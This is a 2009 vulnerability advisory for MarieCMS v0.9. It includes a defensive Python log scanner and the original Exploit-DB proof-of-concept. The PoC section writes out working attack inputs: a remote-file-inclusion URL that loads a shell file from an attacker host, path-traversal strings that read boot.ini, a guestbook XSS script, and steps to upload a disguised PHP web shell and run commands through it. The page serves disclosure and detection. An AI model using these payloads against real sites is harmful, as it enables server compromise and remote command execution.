Vendor: MarieCMS
By: No Author
CVSS: 7.5 (HIGH)
Remote File Inclusion, Local File Inclusion, Persistent XSS and Shell Upload (Authenticated User)
CWE: 94, 98, 79, 264
Product Name: MarieCMS
Affected Version From: 0.9
Affected Version To: 0.9
Patch Exists: No
2009

MarieCMS v0.9 vulnerable to Remote File Inclusion, Local File Inclusion, Persistent XSS and Shell Upload (Authenticated User)

MarieCMS v0.9 is vulnerable to Remote File Inclusion, Local File Inclusion, Persistent XSS and Shell Upload (Authenticated User). For Remote File Inclusion, an attacker can send a malicious URL to the vulnerable server in the page parameter. For Local File Inclusion, an attacker can send a malicious URL to the vulnerable server in the mod parameter. For Persistent XSS, an attacker can put a malicious script in the Name field on the page http://server/mariecms/?page=addgb&mod=gaestebuch. For Shell Upload (Authenticated User), an attacker can rename shell.php to shell.jpg.php and upload it into the galleryupload section. Then, the attacker can view images to get the image id for shell.jpg.php and access the shell.

Mitigation:

The vendor should be contacted to patch the vulnerability.
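
With no patch listed, a defender can look for the request shapes described above in web server access logs. The following Python is an added example, not part of the advisory or of MarieCMS: it flags a URL in the "page" parameter, traversal or a NUL byte in the "mod" parameter, and a .php request under the _images directory. The sample request targets are constructed, the function and label names are assumptions, and the guestbook XSS is left out on the assumption that the Name field travels in the form body.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed request targets (not from a real log); paths follow the advisory.
SAMPLE_REQUESTS = [
    "/mariecms/?page=addgb&mod=gaestebuch",                      # normal guestbook page
    "/mariecms/?page=http://files.example.test/inc.txt?",        # URL in page
    "/mariecms/admin/index.php?mod=..%2F..%2F..%2Fboot.ini%00",  # traversal + NUL in mod
    "/mariecms/_images/17.jpg",                                  # normal gallery image
    "/mariecms/_images/17.php",                                  # script in image directory
]

# "scheme://" or protocol-relative "//host" at the start of a parameter value.
URL_VALUE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:)?//")
# A PHP file served from the gallery upload directory named in the advisory.
SCRIPT_IN_IMAGES = re.compile(r"/_images/[^/]+\.php$")


def classify(target):
    """Return finding labels (hypothetical names) for one request target."""
    parts = urlsplit(target)
    findings = []
    # parse_qsl percent-decodes once, so %2F and %00 are matched in decoded form.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = value.lower()
        if name == "page" and URL_VALUE.match(value):
            findings.append("rfi-url-in-page")
        if name == "mod" and ("../" in value or "..\\" in value or "\x00" in value):
            findings.append("lfi-traversal-in-mod")
    if SCRIPT_IN_IMAGES.search(parts.path.lower()):
        findings.append("script-in-image-dir")
    return findings


def scan(targets):
    """Map each suspicious request target to its findings; clean ones are omitted."""
    report = {}
    for target in targets:
        findings = classify(target)
        if findings:
            report[target] = findings
    return report


if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS).items():
        print(", ".join(findings), "<-", target)
```
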
Source

Exploit-DB raw data:

############
 OVERVIEW
############

MarieCMS v0.9 vulnerable to following issues:

++ Remote File Inclusion
++ Local File Inclusion
++ Persistent XSS
++ Shell Upload (Authenticated User)

######################
 PoC
######################

# Remote File Inclusion:
++++++++++++++++++++++++

http://server/mariecms/?page=http://[attacker]/[site]/shell.txt?

# Local File Inclusion:
+++++++++++++++++++++++

http://server/mariecms/?mod=../../../../../../../../../../boot.ini%00
http://server/mariecms/admin/index.php?mod=../../../../../../../../../../../../boot.ini%00

# Persistent XSS:
+++++++++++++++++

Put <script>alert("XSS")</script> in "Name" field on page
http://server/mariecms/?page=addgb&mod=gaestebuch

# Shell Upload (Authenticated User):
+++++++++++++++

1. Rename shell.php to shell.jpg.php
2. Upload it into galleryupload section.
3. View images to get image id for shell.jpg.php
4. Access shell:
http://[server]/[path]/_images/[image_id].php?cmd=dir



############
 TimeLine
############

Bug discovered 			: 26/11/2009
Informed Vendor			: 30/11/2009 -- No reply received from vendor till the date
Public Disclosure		: 02/12/2009